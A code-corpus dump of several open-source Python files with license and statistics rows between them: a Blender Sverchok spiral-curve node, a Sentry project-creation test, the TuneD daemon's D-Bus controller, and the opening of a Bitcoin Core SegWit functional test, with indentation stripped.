("LOGARITHMIC", "Logarithmic", "Generate a logarithmic spiral.", 1),
("SPHERICAL", "Spherical", "Generate a spherical spiral.", 2),
("OVOIDAL", "Ovoidal", "Generate an ovoidal spiral.", 3),
("CORNU", "Cornu", "Generate a cornu spiral.", 4),
("EXO", "Exo", "Generate an exo spiral.", 5),
("SPIRANGLE", "Spirangle", "Generate a spirangle spiral.", 6)
]
# name : [ preset index, type, eR, iR, exponent, turns, resolution, scale, height ]
spiral_presets = {
" ": (0, "", 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0),
# archimedean spirals
"ARCHIMEDEAN": (10, "ARCHIMEDEAN", 1.0, 0.0, 1.0, 7, 100, 1.0, 0.0),
"PARABOLIC": (11, "ARCHIMEDEAN", 1.0, 0.0, 2.0, 5, 100, 1.0, 0.0),
"HYPERBOLIC": (12, "ARCHIMEDEAN", 1.0, 0.0, -1.0, 11, 100, 1.0, 0.0),
"LITUUS": (13, "ARCHIMEDEAN", 1.0, 0.0, -2.0, 11, 100, 1.0, 0.0),
# logarithmic spirals
"FIBONACCI": (20, "LOGARITHMIC", 1.0, 0.5, PHIPI, 3, 100, 1.0, 0.0),
# 3D spirals (mix type)
"CONICAL": (30, "ARCHIMEDEAN", 1.0, 0.0, 1.0, 7, 100, 1.0, 3.0),
"HELIX": (31, "LOGARITHMIC", 1.0, 0.0, 0.0, 7, 100, 1.0, 4.0),
"SPHERICAL": (32, "SPHERICAL", 1.0, 0.0, 0.0, 11, 55, 1.0, 0.0),
"OVOIDAL": (33, "OVOIDAL", 5.0, 1.0, 0.0, 7, 55, 1.0, 6.0),
# spiral odities
"CORNU": (40, "CORNU", 1.0, 1.0, 1.0, 5, 55, 1.0, 0.0),
"EXO": (41, "EXO", 1.0, 0.1, PHI, 11, 101, 1.0, 0.0),
# choppy spirals
"SPIRANGLE SC": (50, "SPIRANGLE", 1.0, 0.0, 0.0, 8, 4, 1.0, 0.0),
"SPIRANGLE HX": (51, "SPIRANGLE", 1.0, 0.0, 0.5, 7, 6, 1.0, 0.)
}
normalize_items = [
("ER", "eR", "Normalize spiral to the external radius.", 0),
("IR", "iR", "Normalize spiral to the internal radius.", 1)
]
def make_archimedean_spiral(settings):
'''
eR : exterior radius (end radius)
iR : interior radius (start radius)
exponent : rate of growth (between iR and eR)
turns : number of turns in the spiral
N : curve resolution per turn
scale : overall scale of the curve
height : the height of the spiral along z
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
max_phi = 2 * pi * turns * sign
epsilon = 1e-5 if exponent < 0 else 0 # to avoid raising zero to negative power
exponent = 1e-2 if exponent == 0 else exponent # to avoid division by zero
dR = eR - iR # radius range : cached for performance
ex = 1 / exponent # inverse exponent : cached for performance
N = N * turns # total number of points in the spiral
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
t = n / N # t : [0, 1]
phi = max_phi * t + phase
r = (iR + dR * (t + epsilon) ** ex) * scale # essentially: r = a * t ^ (1/b)
x = r * cos(phi)
y = r * sin(phi)
z = height * t
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def make_logarithmic_spiral(settings):
'''
eR : exterior radius
iR : interior radius
exponent : rate of growth
turns : number of turns in the spiral
N : curve resolution per turn
scale : overall scale of the curve
height : the height of the spiral along z
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
max_phi = 2 * pi * turns
N = N * turns # total number of points in the spiral
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
t = n / N # t : [0, 1]
phi = max_phi * t
r = eR * exp(exponent * phi) * scale # essentially: r = a * e ^ (b*t)
pho = phi * sign + phase # final angle : cached for performance
x = r * sin(pho)
y = r * cos(pho)
z = height * t
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def make_spherical_spiral(settings):
'''
This is the approximate sperical spiral that has a finite length,
where the phi & theta angles sweep their ranges at constant rates.
eR : exterior radius
iR : interior radius (UNUSED)
exponent : rate of growth (sigmoid in & out)
turns : number of turns in the spiral
N : the curve resolution of one turn
scale : overall scale of the curve
height : the height of the spiral along z (UNUSED)
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
max_phi = 2 * pi * turns * sign
N = N * turns # total number of points in the spiral
es = prepareExponentialSettings(2, exponent + 1e-5) # used for easing
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
t = n / N # t : [0, 1]
phi = max_phi * t + phase
a = ExponentialEaseInOut(t, es) # ease theta variation
theta = -pi / 2 + pi * a
RxCosTheta = (iR + eR * cos(theta)) * scale # cached for performance
x = cos(phi) * RxCosTheta
y = sin(phi) * RxCosTheta
z = eR * sin(theta)
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def make_ovoidal_spiral(settings):
'''
eR : exterior radius (vertical cross section circles)
iR : interior radius (horizontal cross section circle)
exponent : rate of growth (sigmoid in & out)
turns : number of turns in the spiral
N : the curve resolution of one turn
scale : overall scale of the curve
height : the height of the spiral along z
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
max_phi = 2 * pi * turns * sign
# derive eR based on iR and height (the main parameters)
# eR = [iR - (H/2)^2/iR]/2 ::: H = 2 * sqrt(2*iR*eR - iR*iR)
eR = 0.5 * (iR + 0.25 * height * height / iR)
eR2 = eR * eR # cached for performance
dR = eR - iR # cached for performance
N = N * turns # total number of points in the spiral
es = prepareExponentialSettings(2, exponent + 1e-5) # used for easing
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
t = n / N # t : [0, 1]
phi = max_phi * t + phase
a = ExponentialEaseInOut(t, es) # ease theta variation
theta = -pi / 2 + pi * a
h = 0.5 * height * sin(theta) # [-H/2, +H/2]
r = sqrt(eR2 - h * h) - dR # [0 -> iR -> 0]
x = r * cos(phi) * scale
y = r * sin(phi) * scale
z = h * scale
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def make_cornu_spiral(settings):
'''
L : length
N : resolution
S : scale
M :
x(t) = s * Integral(0,t) { cos(pi*u*u/2) du }
y(t) = s * Integral(0,t) { sin(pi*u*u/2) du }
TODO : refine the math (smoother curve, adaptive res, faster computation)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
N = N * turns # total number of points in the spiral
L = iR * turns # length
S = eR * scale # overall scale
es = prepareExponentialSettings(2, exponent + 1e-5) # used for easing
verts1 = [] # pozitive spiral verts
verts2 = [] # nagative spiral verts
norms = []
add_vert1 = verts1.append
add_vert2 = verts2.append
add_norm = norms.append
l1 = 0
x = 0
y = 0
for n in range(N + 1):
t = n / N # t = [0,1]
a = QuadraticEaseOut(t)
# a = ExponentialEaseOut(t, es)
l = L * a # l = [0, +L]
r = x * x + y * y
# print("r=", r)
# M = 100 + int(300 * pow(r, exponent)) # integral steps
M = 100 + int(100 * a) # integral steps
l2 = l
# integral from l1 to l2
u = l1
du = (l2 - l1) / M
for m in range(M + 1):
u = u + du # u = [l1, l2]
phi = u * u * pi / 2
x = x + cos(phi) * du
y = y + sin(phi) * du
l1 = l2
# scale and flip
xx = x * S
yy = y * S * sign
# rotate by phase amount
px = xx * cos(phase) - yy * sin(phase)
py = xx * sin(phase) + yy * cos(phase)
pz = height * t
add_vert1([px, py, pz]) # positive spiral verts
add_vert2([-px, -py, -pz]) # netative spiral verts
verts = verts2[::-1] + verts1
edges = get_edge_list(N)
return verts, edges, norms
def make_exo_spiral(settings):
'''
This is an exponential in & out between two circles
eR : exterior radius
iR : interior radius
exponent : rate of growth (SIGMOID : exponential in & out)
turns : number of turns in the spiral
N : the curve resolution of one turn
scale : overall scale of the curve
height : the height of the spiral along z
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = 1 if flip else -1 # flip direction ?
max_phi = 2 * pi * turns * sign
N = N * turns # total number of points in the spiral
es = prepareExponentialSettings(11, exponent + 1e-5) # used for easing
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
t = n / N # t : [0, 1]
a = ExponentialEaseInOut(t, es) # ease radius variation (SIGMOID)
r = (iR + (eR - iR) * a) * scale
phi = max_phi * t + phase
x = r * cos(phi)
y = r * sin(phi)
z = height * t
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def make_spirangle_spiral(settings):
'''
eR : exterior radius (end radius)
iR : interior radius (start radius)
exponent : rate of growth
turns : number of turns in the spiral
N : curve resolution per turn
scale : overall scale of the curve
height : the height of the spiral along z
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
deltaA = 2 * pi / N * sign # angle increment
deltaE = exponent / N # exponent increment
deltaR = (eR + iR) # radius increment
deltaZ = height / (N * turns) # z increment
e = 0
r = iR
phi = phase
x, y, z = [0, 0, -deltaZ]
N = N * turns # total number of points in the spiral
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
x = x + r * cos(phi) * scale
y = y + r * sin(phi) * scale
z = z + deltaZ
e = e + deltaE
r = r + deltaR * exp(e)
phi = phi + deltaA
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def normalize_spiral(verts, normalize_eR, eR, iR, scale):
'''
Normalize the spiral (XY) to either exterior or interior radius
'''
if normalize_eR: # normalize to exterior radius (ending radius)
psx = verts[-1][0] # x coordinate of the last point in the spiral
psy = verts[-1][1] # y coordinate of the last point in the spiral
r = sqrt(psx * psx + psy * psy)
ss = eR / r * scale if eR != 0 else 1
else: # normalize to interior radius (starting radius)
psx = verts[0][0] # x coordinate of the first point in the spiral
psy = verts[0][1] # y coordinate of the first point in the spiral
r = sqrt(psx * psx + psy * psy)
ss = iR / r * scale if iR != 0 else 1
for n in range(len(verts)):
verts[n][0] *= ss
verts[n][1] *= ss
return verts
class SvSpiralNodeMK2(bpy.types.Node, SverchCustomTreeNode, SvAngleHelper):
"""
Triggers: Spiral
Tooltip: Generate spiral curves
"""
bl_idname = 'SvSpiralNodeMK2'
bl_label = 'Spiral'
sv_icon = "SV_SPIRAL"
def update_angles(self, context, au):
''' Update all the angles to preserve their values in the new units '''
self.phase = self.phase * au
def update_spiral(self, context):
if self.updating:
return
self.presets = " "
updateNode(self, context)
def preset_items(self, context):
return [(k, k.title(), "", "", s[0]) for k, s in sorted(spiral_presets.items(), key=lambda k: k[1][0])]
def update_presets(self, context):
self.updating = True
if self.presets == " ":
self.updating = False
return
_, sT, eR, iR, e, t, N, s, h = spiral_presets[self.presets]
self.sType = sT
self.eRadius = eR
self.iRadius = iR
self.exponent = e
self.turns = t
self.resolution = N
self.scale = s
self.height = h
self.phase = 0.0
self.arms = 1
self.flip = False
self.separate = False
self.updating = False
updateNode(self, context)
presets: EnumProperty(
name="Presets", items=preset_items,
update=update_presets)
sType: EnumProperty(
name="Type", items=spiral_type_items,
default="ARCHIMEDEAN", update=update_spiral)
normalize: EnumProperty(
name="Normalize Radius", items=normalize_items,
default="ER", update=update_spiral)
iRadius: FloatProperty(
name="Interior Radius", description="Interior radius",
default=1.0, min=0.0, update=update_spiral)
eRadius: FloatProperty(
name="Exterior Radius", description="Exterior radius",
default=2.0, min=0.0, update=update_spiral)
turns: IntProperty(
name="Turns", description="Number of turns",
default=11, min=1, update=update_spiral)
arms: IntProperty(
name="Arms", description="Number of spiral arms",
default=1, min=1, update=update_spiral)
flip: BoolProperty(
name="Flip Direction", description="Flip spiral direction",
default=False, update=update_spiral)
scale: FloatProperty(
name="Scale", description="Scale spiral vertices",
default=1.0, update=update_spiral)
height: FloatProperty(
name="Height", description="Height of the spiral along z",
default=0.0, update=update_spiral)
phase: FloatProperty(
name="Phase", description="Phase amount around spiral center",
default=0.0, update=SvAngleHelper.update_angle)
exponent: FloatProperty(
name="Exponent", description="Exponent attenuator",
default=2.0, update=update_spiral)
resolution: IntProperty(
name="Turn Resolution", description="Number of vertices in one turn in the spiral",
default=100, min=3, update=update_spiral)
separate: BoolProperty(
name="Separate arms",
description="Separate the spiral arms",
default=False, update=update_spiral)
updating: BoolProperty(default=False) # used for disabling update callback
def migrate_from(self, old_node):
''' Migration from old nodes '''
if old_node.bl_idname == "SvSpiralNode":
self.sType = old_node.stype
self.last_angle_units = AngleUnits.RADIANS
self.angle_units = AngleUnits.RADIANS
def sv_init(self, context):
self.width = 170
self.inputs.new('SvStringsSocket', "R").prop_name = 'eRadius'
self.inputs.new('SvStringsSocket', "r").prop_name = 'iRadius'
self.inputs.new('SvStringsSocket', "e").prop_name = 'exponent'
self.inputs.new('SvStringsSocket', "t").prop_name = 'turns'
self.inputs.new('SvStringsSocket', "n").prop_name = 'resolution'
self.inputs.new('SvStringsSocket', "s").prop_name = 'scale'
self.inputs.new('SvStringsSocket', "h").prop_name = 'height'
self.inputs.new('SvStringsSocket', "p").prop_name = 'phase'
self.inputs.new('SvStringsSocket', "a").prop_name = 'arms'
self.outputs.new('SvVerticesSocket', "Vertices")
self.outputs.new('SvStringsSocket', "Edges")
self.presets = "ARCHIMEDEAN"
def draw_buttons(self, context, layout):
layout.prop(self, 'presets')
layout.prop(self, 'sType', text="")
col = layout.column(align=True)
if self.sType in ("LOGARITHMIC", "ARCHIMEDEAN", "SPIRANGLE"):
row = col.row(align=True)
row.prop(self, 'normalize', expand=True)
row = col.row(align=True)
row.prop(self, 'flip', text="Flip", toggle=True)
row.prop(self, 'separate', text="Separate", toggle=True)
def draw_buttons_ext(self, context, layout):
self.draw_angle_units_buttons(context, layout)
def process(self):
outputs = self.outputs
# return if no outputs are connected
if not any(s.is_linked for s in outputs):
return
# input values lists (single or multi value)
inputs = self.inputs
input_R = inputs["R"].sv_get()[0] # list of exterior radii
input_r = inputs["r"].sv_get()[0] # list of interior radii
input_e = inputs["e"].sv_get()[0] # list of exponents
input_t = inputs["t"].sv_get()[0] # list of turns
input_n = inputs["n"].sv_get()[0] # list of curve resolutions
input_s = inputs["s"].sv_get()[0] # list of scales
input_h = inputs["h"].sv_get()[0] # list of heights (z)
input_p = inputs["p"].sv_get()[0] # list of phases
input_a = inputs["a"].sv_get()[0] # list of arms
# sanitize the input
input_R = list(map(lambda x: max(0.0, x), input_R))
input_r = list(map(lambda x: max(0.0, x), input_r))
input_t = list(map(lambda x: max(1, int(x)), input_t))
input_n = list(map(lambda x: max(3, int(x)), input_n))
input_a = list(map(lambda x: max(1, int(x)), input_a))
# extra parameters
f = self.flip # flip direction
parameters = match_long_repeat([input_R, input_r, input_e, input_t,
input_n, input_s, input_h, input_p, input_a])
# conversion factor from the current angle units to radians
au = self.radians_conversion_factor()
make_spiral = eval("make_" + self.sType.lower() + "_spiral")
verts_list = []
edges_list = []
for R, r, e, t, n, s, h, p, a in zip(*parameters):
p = p * au
arm_verts = []
arm_edges = []
for i in range(a): # generate each arm
pa = p + 2 * pi / a * i
settings = [R, r, e, t, n, s, h, pa, f] # spiral settings
verts, edges, norms = make_spiral(settings)
if self.sType in ("LOGARITHMIC", "ARCHIMEDEAN", "SPIRANGLE"):
normalize_spiral(verts, self.normalize == "ER", R, r, s)
if self.separate:
arm_verts.append(verts)
arm_edges.append(edges)
else: # join the arms
o = len(arm_verts)
edges = [[i1 + o, i2 + o] for (i1, i2) in edges]
arm_verts.extend(verts)
arm_edges.extend(edges)
verts_list.append(arm_verts)
edges_list.append(arm_edges)
self.outputs['Vertices'].sv_set(verts_list)
self.outputs['Edges'].sv_set(edges_list)
def register():
bpy.utils.register_class(SvSpiralNodeMK2)
def unregister():
bpy.utils.unregister_class(SvSpiralNodeMK2)
| gpl-3.0 | -9,002,781,532,965,027,000 | 32.879389 | 111 | 0.567437 | false |
simmetria/sentry | tests/sentry/web/frontend/projects/tests.py | 1 | 1710 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import logging
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from sentry.constants import MEMBER_OWNER
from sentry.models import Project, Team
from sentry.testutils import fixture
from sentry.testutils import TestCase
logger = logging.getLogger(__name__)
class NewProjectTest(TestCase):
fixtures = ['tests/fixtures/views.json']
@fixture
def user(self):
user = User(username="admin", email="admin@localhost", is_staff=True, is_superuser=True)
user.set_password('admin')
user.save()
return user
@fixture
def team(self):
return Team.objects.create(name='foo', slug='foo', owner=self.user)
def test_new_project(self):
path = reverse('sentry-new-team-project', args=[self.team.slug])
self.client.login(username='admin', password='admin')
# missing name
resp = self.client.post(path)
self.assertEquals(resp.status_code, 200)
# valid params
resp = self.client.post(path, {
'name': 'Test Project',
'slug': 'test',
})
self.assertNotEquals(resp.status_code, 200)
project = Project.objects.filter(name='Test Project')
self.assertTrue(project.exists())
project = project.get()
self.assertEquals(project.owner, self.user)
self.assertNotEquals(project.team, None)
member_set = list(project.team.member_set.all())
self.assertEquals(len(member_set), 1)
member = member_set[0]
self.assertEquals(member.user, self.user)
self.assertEquals(member.type, MEMBER_OWNER)
| bsd-3-clause | 2,186,302,857,400,867,300 | 27.5 | 96 | 0.649708 | false |
redhat-performance/tuned | tuned/daemon/controller.py | 1 | 8767 | from tuned import exports
import tuned.logs
import tuned.exceptions
from tuned.exceptions import TunedException
import threading
import tuned.consts as consts
from tuned.utils.commands import commands
__all__ = ["Controller"]
log = tuned.logs.get()
class TimerStore(object):
def __init__(self):
self._timers = dict()
self._timers_lock = threading.Lock()
def store_timer(self, token, timer):
with self._timers_lock:
self._timers[token] = timer
def drop_timer(self, token):
with self._timers_lock:
try:
timer = self._timers[token]
timer.cancel()
del self._timers[token]
except:
pass
def cancel_all(self):
with self._timers_lock:
for timer in self._timers.values():
timer.cancel()
self._timers.clear()
class Controller(tuned.exports.interfaces.ExportableInterface):
"""
Controller's purpose is to keep the program running, start/stop the tuning,
and export the controller interface (currently only over D-Bus).
"""
def __init__(self, daemon, global_config):
super(Controller, self).__init__()
self._daemon = daemon
self._global_config = global_config
self._terminate = threading.Event()
self._cmd = commands()
self._timer_store = TimerStore()
def run(self):
"""
Controller main loop. The call is blocking.
"""
log.info("starting controller")
res = self.start()
daemon = self._global_config.get_bool(consts.CFG_DAEMON, consts.CFG_DEF_DAEMON)
if not res and daemon:
exports.start()
if daemon:
self._terminate.clear()
# we have to pass some timeout, otherwise signals will not work
while not self._cmd.wait(self._terminate, 10):
pass
log.info("terminating controller")
self.stop()
def terminate(self):
self._terminate.set()
@exports.signal("sbs")
def profile_changed(self, profile_name, result, errstr):
pass
# exports decorator checks the authorization (currently through polkit), caller is None if
# no authorization was performed (i.e. the call should process as authorized), string
# identifying caller (with DBus it's the caller bus name) if authorized and empty
# string if not authorized, caller must be the last argument
def _log_capture_abort(self, token):
tuned.logs.log_capture_finish(token)
self._timer_store.drop_timer(token)
@exports.export("ii", "s")
def log_capture_start(self, log_level, timeout, caller = None):
if caller == "":
return ""
token = tuned.logs.log_capture_start(log_level)
if token is None:
return ""
if timeout > 0:
timer = threading.Timer(timeout,
self._log_capture_abort, args = [token])
self._timer_store.store_timer(token, timer)
timer.start()
return "" if token is None else token
@exports.export("s", "s")
def log_capture_finish(self, token, caller = None):
if caller == "":
return ""
res = tuned.logs.log_capture_finish(token)
self._timer_store.drop_timer(token)
return "" if res is None else res
@exports.export("", "b")
def start(self, caller = None):
if caller == "":
return False
if self._global_config.get_bool(consts.CFG_DAEMON, consts.CFG_DEF_DAEMON):
if self._daemon.is_running():
return True
elif not self._daemon.is_enabled():
return False
return self._daemon.start()
@exports.export("", "b")
def stop(self, caller = None):
if caller == "":
return False
if not self._daemon.is_running():
res = True
else:
res = self._daemon.stop()
self._timer_store.cancel_all()
return res
@exports.export("", "b")
def reload(self, caller = None):
if caller == "":
return False
if self._daemon.is_running():
stop_ok = self.stop()
if not stop_ok:
return False
try:
self._daemon.reload_profile_config()
except TunedException as e:
log.error("Failed to reload TuneD: %s" % e)
return False
return self.start()
def _switch_profile(self, profile_name, manual):
was_running = self._daemon.is_running()
msg = "OK"
success = True
reapply = False
try:
if was_running:
self._daemon.stop(profile_switch = True)
self._daemon.set_profile(profile_name, manual)
except tuned.exceptions.TunedException as e:
success = False
msg = str(e)
if was_running and self._daemon.profile.name == profile_name:
log.error("Failed to reapply profile '%s'. Did it change on disk and break?" % profile_name)
reapply = True
else:
log.error("Failed to apply profile '%s'" % profile_name)
finally:
if was_running:
if reapply:
log.warn("Applying previously applied (possibly out-dated) profile '%s'." % profile_name)
elif not success:
log.info("Applying previously applied profile.")
self._daemon.start()
return (success, msg)
@exports.export("s", "(bs)")
def switch_profile(self, profile_name, caller = None):
if caller == "":
return (False, "Unauthorized")
return self._switch_profile(profile_name, True)
@exports.export("", "(bs)")
def auto_profile(self, caller = None):
if caller == "":
return (False, "Unauthorized")
profile_name = self.recommend_profile()
return self._switch_profile(profile_name, False)
@exports.export("", "s")
def active_profile(self, caller = None):
if caller == "":
return ""
if self._daemon.profile is not None:
return self._daemon.profile.name
else:
return ""
@exports.export("", "(ss)")
def profile_mode(self, caller = None):
if caller == "":
return "unknown", "Unauthorized"
manual = self._daemon.manual
if manual is None:
# This means no profile is applied. Check the preset value.
try:
profile, manual = self._cmd.get_active_profile()
if manual is None:
manual = profile is not None
except TunedException as e:
mode = "unknown"
error = str(e)
return mode, error
mode = consts.ACTIVE_PROFILE_MANUAL if manual else consts.ACTIVE_PROFILE_AUTO
return mode, ""
@exports.export("", "s")
def post_loaded_profile(self, caller = None):
if caller == "":
return ""
return self._daemon.post_loaded_profile or ""
@exports.export("", "b")
def disable(self, caller = None):
if caller == "":
return False
if self._daemon.is_running():
self._daemon.stop()
if self._daemon.is_enabled():
self._daemon.set_all_profiles(None, True, None,
save_instantly=True)
return True
@exports.export("", "b")
def is_running(self, caller = None):
if caller == "":
return False
return self._daemon.is_running()
@exports.export("", "as")
def profiles(self, caller = None):
if caller == "":
return []
return self._daemon.profile_loader.profile_locator.get_known_names()
@exports.export("", "a(ss)")
def profiles2(self, caller = None):
if caller == "":
return []
return self._daemon.profile_loader.profile_locator.get_known_names_summary()
@exports.export("s", "(bsss)")
def profile_info(self, profile_name, caller = None):
if caller == "":
return tuple(False, "", "", "")
if profile_name is None or profile_name == "":
profile_name = self.active_profile()
return tuple(self._daemon.profile_loader.profile_locator.get_profile_attrs(profile_name, [consts.PROFILE_ATTR_SUMMARY, consts.PROFILE_ATTR_DESCRIPTION], [""]))
@exports.export("", "s")
def recommend_profile(self, caller = None):
if caller == "":
return ""
return self._daemon.profile_recommender.recommend()
@exports.export("", "b")
def verify_profile(self, caller = None):
if caller == "":
return False
return self._daemon.verify_profile(ignore_missing = False)
@exports.export("", "b")
def verify_profile_ignore_missing(self, caller = None):
if caller == "":
return False
return self._daemon.verify_profile(ignore_missing = True)
@exports.export("", "a{sa{ss}}")
def get_all_plugins(self, caller = None):
"""Return dictionary with accesible plugins
Return:
dictionary -- {plugin_name: {parameter_name: default_value}}
"""
if caller == "":
return False
plugins = {}
for plugin_class in self._daemon.get_all_plugins():
plugin_name = plugin_class.__module__.split(".")[-1].split("_", 1)[1]
conf_options = plugin_class._get_config_options()
plugins[plugin_name] = {}
for key, val in conf_options.items():
plugins[plugin_name][key] = str(val)
return plugins
@exports.export("s","s")
def get_plugin_documentation(self, plugin_name, caller = None):
"""Return docstring of plugin's class"""
if caller == "":
return False
return self._daemon.get_plugin_documentation(str(plugin_name))
@exports.export("s","a{ss}")
def get_plugin_hints(self, plugin_name, caller = None):
"""Return dictionary with plugin's parameters and their hints
Parameters:
plugin_name -- name of plugin
Return:
dictionary -- {parameter_name: hint}
"""
if caller == "":
return False
return self._daemon.get_plugin_hints(str(plugin_name))
| gpl-2.0 | 5,299,379,313,047,276,000 | 27.280645 | 161 | 0.671381 | false |
r8921039/bitcoin | test/functional/feature_segwit.py | 1 | 36451 | #!/usr/bin/env python3
# Copyright (c) 2016-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the SegWit changeover logic."""
from decimal import Decimal
from io import BytesIO
from test_framework.address import (
key_to_p2pkh,
program_to_witness,
script_to_p2sh,
script_to_p2sh_p2wsh,
script_to_p2wsh,
)
from test_framework.blocktools import witness_script, send_to_witness
from test_framework.messages import COIN, COutPoint, CTransaction, CTxIn, CTxOut, FromHex, sha256, ToHex
from test_framework.script import CScript, OP_HASH160, OP_CHECKSIG, OP_0, hash160, OP_EQUAL, OP_DUP, OP_EQUALVERIFY, OP_1, OP_2, OP_CHECKMULTISIG, OP_TRUE, OP_DROP
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error, connect_nodes, hex_str_to_bytes, sync_blocks, try_rpc
NODE_0 = 0
NODE_2 = 2
WIT_V0 = 0
WIT_V1 = 1
def getutxo(txid):
utxo = {}
utxo["vout"] = 0
utxo["txid"] = txid
return utxo
def find_spendable_utxo(node, min_value):
for utxo in node.listunspent(query_options={'minimumAmount': min_value}):
if utxo['spendable']:
return utxo
raise AssertionError("Unspent output equal or higher than %s not found" % min_value)
txs_mined = {} # txindex from txid to blockhash
class SegWitTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
# This test tests SegWit both pre and post-activation, so use the normal BIP9 activation.
self.extra_args = [
[
"-rpcserialversion=0",
"-vbparams=segwit:0:999999999999",
"-addresstype=legacy",
],
[
"-blockversion=4",
"-rpcserialversion=1",
"-vbparams=segwit:0:999999999999",
"-addresstype=legacy",
],
[
"-blockversion=536870915",
"-vbparams=segwit:0:999999999999",
"-addresstype=legacy",
],
]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def setup_network(self):
super().setup_network()
connect_nodes(self.nodes[0], 2)
self.sync_all()
def success_mine(self, node, txid, sign, redeem_script=""):
send_to_witness(1, node, getutxo(txid), self.pubkey[0], False, Decimal("49.998"), sign, redeem_script)
block = node.generate(1)
assert_equal(len(node.getblock(block[0])["tx"]), 2)
sync_blocks(self.nodes)
def skip_mine(self, node, txid, sign, redeem_script=""):
send_to_witness(1, node, getutxo(txid), self.pubkey[0], False, Decimal("49.998"), sign, redeem_script)
block = node.generate(1)
assert_equal(len(node.getblock(block[0])["tx"]), 1)
sync_blocks(self.nodes)
def fail_accept(self, node, error_msg, txid, sign, redeem_script=""):
assert_raises_rpc_error(-26, error_msg, send_to_witness, use_p2wsh=1, node=node, utxo=getutxo(txid), pubkey=self.pubkey[0], encode_p2sh=False, amount=Decimal("49.998"), sign=sign, insert_redeem_script=redeem_script)
def run_test(self):
self.nodes[0].generate(161) # block 161
self.log.info("Verify sigops are counted in GBT with pre-BIP141 rules before the fork")
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 1)
tmpl = self.nodes[0].getblocktemplate({'rules': ['segwit']})
assert tmpl['sizelimit'] == 1000000
assert 'weightlimit' not in tmpl
assert tmpl['sigoplimit'] == 20000
assert tmpl['transactions'][0]['hash'] == txid
assert tmpl['transactions'][0]['sigops'] == 2
tmpl = self.nodes[0].getblocktemplate({'rules': ['segwit']})
assert tmpl['sizelimit'] == 1000000
assert 'weightlimit' not in tmpl
assert tmpl['sigoplimit'] == 20000
assert tmpl['transactions'][0]['hash'] == txid
assert tmpl['transactions'][0]['sigops'] == 2
self.nodes[0].generate(1) # block 162
balance_presetup = self.nodes[0].getbalance()
self.pubkey = []
p2sh_ids = [] # p2sh_ids[NODE][VER] is an array of txids that spend to a witness version VER pkscript to an address for NODE embedded in p2sh
wit_ids = [] # wit_ids[NODE][VER] is an array of txids that spend to a witness version VER pkscript to an address for NODE via bare witness
for i in range(3):
newaddress = self.nodes[i].getnewaddress()
self.pubkey.append(self.nodes[i].getaddressinfo(newaddress)["pubkey"])
multiscript = CScript([OP_1, hex_str_to_bytes(self.pubkey[-1]), OP_1, OP_CHECKMULTISIG])
p2sh_ms_addr = self.nodes[i].addmultisigaddress(1, [self.pubkey[-1]], '', 'p2sh-segwit')['address']
bip173_ms_addr = self.nodes[i].addmultisigaddress(1, [self.pubkey[-1]], '', 'bech32')['address']
assert_equal(p2sh_ms_addr, script_to_p2sh_p2wsh(multiscript))
assert_equal(bip173_ms_addr, script_to_p2wsh(multiscript))
p2sh_ids.append([])
wit_ids.append([])
for v in range(2):
p2sh_ids[i].append([])
wit_ids[i].append([])
for i in range(5):
for n in range(3):
for v in range(2):
wit_ids[n][v].append(send_to_witness(v, self.nodes[0], find_spendable_utxo(self.nodes[0], 50), self.pubkey[n], False, Decimal("49.999")))
p2sh_ids[n][v].append(send_to_witness(v, self.nodes[0], find_spendable_utxo(self.nodes[0], 50), self.pubkey[n], True, Decimal("49.999")))
self.nodes[0].generate(1) # block 163
sync_blocks(self.nodes)
# Make sure all nodes recognize the transactions as theirs
assert_equal(self.nodes[0].getbalance(), balance_presetup - 60 * 50 + 20 * Decimal("49.999") + 50)
assert_equal(self.nodes[1].getbalance(), 20 * Decimal("49.999"))
assert_equal(self.nodes[2].getbalance(), 20 * Decimal("49.999"))
self.nodes[0].generate(260) # block 423
sync_blocks(self.nodes)
self.log.info("Verify witness txs are skipped for mining before the fork")
self.skip_mine(self.nodes[2], wit_ids[NODE_2][WIT_V0][0], True) # block 424
